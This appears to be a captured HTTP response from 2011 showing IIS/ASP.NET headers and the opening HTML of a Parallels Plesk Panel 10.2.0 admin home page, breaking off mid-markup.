no_frames=deleted;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:07 GMT
Connection: close
Content-Length: 16330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top